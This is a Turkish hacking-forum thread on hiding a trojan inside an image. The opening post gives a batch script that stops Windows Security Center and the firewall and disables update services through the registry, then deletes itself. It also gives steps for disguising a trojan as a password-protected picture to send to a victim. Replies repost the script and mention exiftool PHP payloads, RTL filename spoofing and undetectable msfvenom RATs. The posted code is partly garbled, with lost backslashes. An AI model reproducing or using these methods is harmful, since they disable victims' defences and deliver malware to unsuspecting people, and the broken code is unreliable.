Resme trojan gömmek

Serhat2

Üye
7 Ara 2020
73
29
Resime trojan koyma kodumuz :
Kod:
Kod:
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO A R E S
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic eswuauserv]
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesw scsvc]
START /WAIT REGEDIT /S "%Temp%.kill.reg"
DEL "%Temp%.kill.reg"
DEL %0
2.olarak bunu 2 biçimde resime yazabiliriz

1.Resmi sağ tıklayıp not defterinde açın sonra karşımıza gelen karışık kodlu sayfada entere basın satır aşağıya kaysın bu kodu yapıştırıp kaydet diyerek çıkalım .

2.Benim tercihim daha iyi bir şekilde işleyebiliriz bunun için öncelikle SecurEngine Pro 1.0 programını indiriyoruz
Programı nasıl kullanıcağınızı anlatıyorum :

SecurEngine Pro . programını yükledikten sonra çalıştıralım .
Hide Files seçeneğine tıklayıp , çıkan ekrandan Add Files e tıklayıp resmi seçelim.

Sonrada gizlemek istediğimiz dosyayı seçiyoruz next diyoruz ,select carrier e basıp

göndereceğimiz kişinin görmesini istediğimiz gerçek resmi seçiyoruz

ardından next diyoruz. enter password kısmına bi şifre koyalım mutlaka yoksa

devam etmez.burada koyduğumuz şifrenin görevi,dosyanızı bulduklarında gördüklerinde trojanı resimden atamaz

koyduğunuz şifreyi bilmesi lazım trojanı resimden atmak için koyduğunuz şifre gerekli bunu siz yapabilirsiniz
import 'a basalım sonrasında save as basalım. sonrada göndericeğimiz trojanlı resmin

ismini yazın ve istediğiniz yere kaydedin. Sorunuz olursa yorum atabilirsiniz saygılar.

alexandre20

Katılımcı Üye
13 Tem 2022
908
11
716
paylaştığınız scripti "kod" olarak koymadığınız için backslash (\ ) karakterlerinin yok olduğunu ve kodun çalışmayacak olmasını bir kenara bıraktım, ilk yöntemde yaptığınız şey resim dosyasının formatını bozmaktan başka birşey değil. İkinci yöntemde de yaptığınız şey zaten "resme trojan gömmek" değil, "trojana resim gömmek" yani final dosya yine .exe olacak. Hiçbir işe yaramayacak bir paylaşım olmuş başarılar.

Klaxxon

Katılımcı Üye
5 Şub 2022
774
5
783
exiftool ile php payloadı konur resme ve internet sitesine yüklendiğinde php payloadı çalışır ve hack işlemi başlar arkadaşın da dediği gibi exe olarak çıkacaktır.

darksideofwww

Katılımcı Üye
28 Tem 2022
915
5
515
dsowww
Kod:
Kod:
@echo off
net stop SharedAccess
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esSharedAccess]
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic eswuauserv]
DEL "%Temp%.kill.reg"
DEL %0

1.Resmi sağ tıklayıp not defterinde açın sonra karşımıza gelen karışık kodlu sayfada entere basın satır aşağıya kaysın bu kodu yapıştırıp kaydet diyerek çıkalım .

2.Benim tercihim daha iyi bir şekilde işleyebiliriz bunun için öncelikle SecurEngine Pro 1.0 programını indiriyoruz

Hide Files seçeneğine tıklayıp , çıkan ekrandan Add Files e tıklayıp resmi seçelim.

Sonrada gizlemek istediğimiz dosyayı seçiyoruz next diyoruz ,select carrier e basıp

devam etmez.burada koyduğumuz şifrenin görevi,dosyanızı bulduklarında gördüklerinde trojanı resimden atamaz

koyduğunuz şifreyi bilmesi lazım trojanı resimden atmak için koyduğunuz şifre gerekli bunu siz yapabilirsiniz
import 'a basalım sonrasında save as basalım. sonrada göndericeğimiz trojanlı resmin

ismini yazın ve istediğiniz yere kaydedin. Sorunuz olursa yorum atabilirsiniz saygılar.
Dostum biz böyle trojan gömmüyoruz resme zaten "RTL" yapılmazsa exe uzantılı olur inandirıcı olmaz

Huddraw

Üye
26 Nis 2020
193
1
34
Peki bu kodlar neyle ilgili trojan olarak çalışıcak ki bizim yönetemediğimiz bişey için ne gerek var zarardan başka bişey olmaz.

Flack

Katılımcı Üye
5 Tem 2020
475
2
391
in Turkey
Kod:
Kod:
@echo off
net stop SharedAccess
DEL "%Temp%.kill.reg"
DEL %0

kodu sanırım kendin yazmışsın eline sağlık ama sadece bu yetmez kendini geliştirip yeni kod yazmalısın ve kullanım ihtiyacı talebine karşılık veren bir proje daha uygun olur

Serhat2

Üye
7 Ara 2020
73
29
yanlış tahmin. Kod buradan (ç)alıntı:
çalıntı ? dostum kendi araştırmalarımla kodu buldm emeğe saygı kardeşim benim

Hocam, Meterpreter'in zamanı geçtimi ?
Msfvenom ile Rat yaptığımda bütün Antivirüsler bulmuştu
Önerdiğin Msfvenom FUD varmı ?
Teşekkür ederim
Özel Mesaj at detaylı konuşurz

yanlış tahmin. Kod buradan (ç)alıntı:
Bu yazdığının yazdığı resimlerin altında virüs yapımı yazıyor dostum yani çalıntı değil .d

:D
bunu da çalmazsın be kanka
Bu yazdığının yazdığı resimlerin altında virüs yapımı yazıyor forma gir bak .d bilmeden konuşmayın

Moderatör tarafında düzenlendi:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.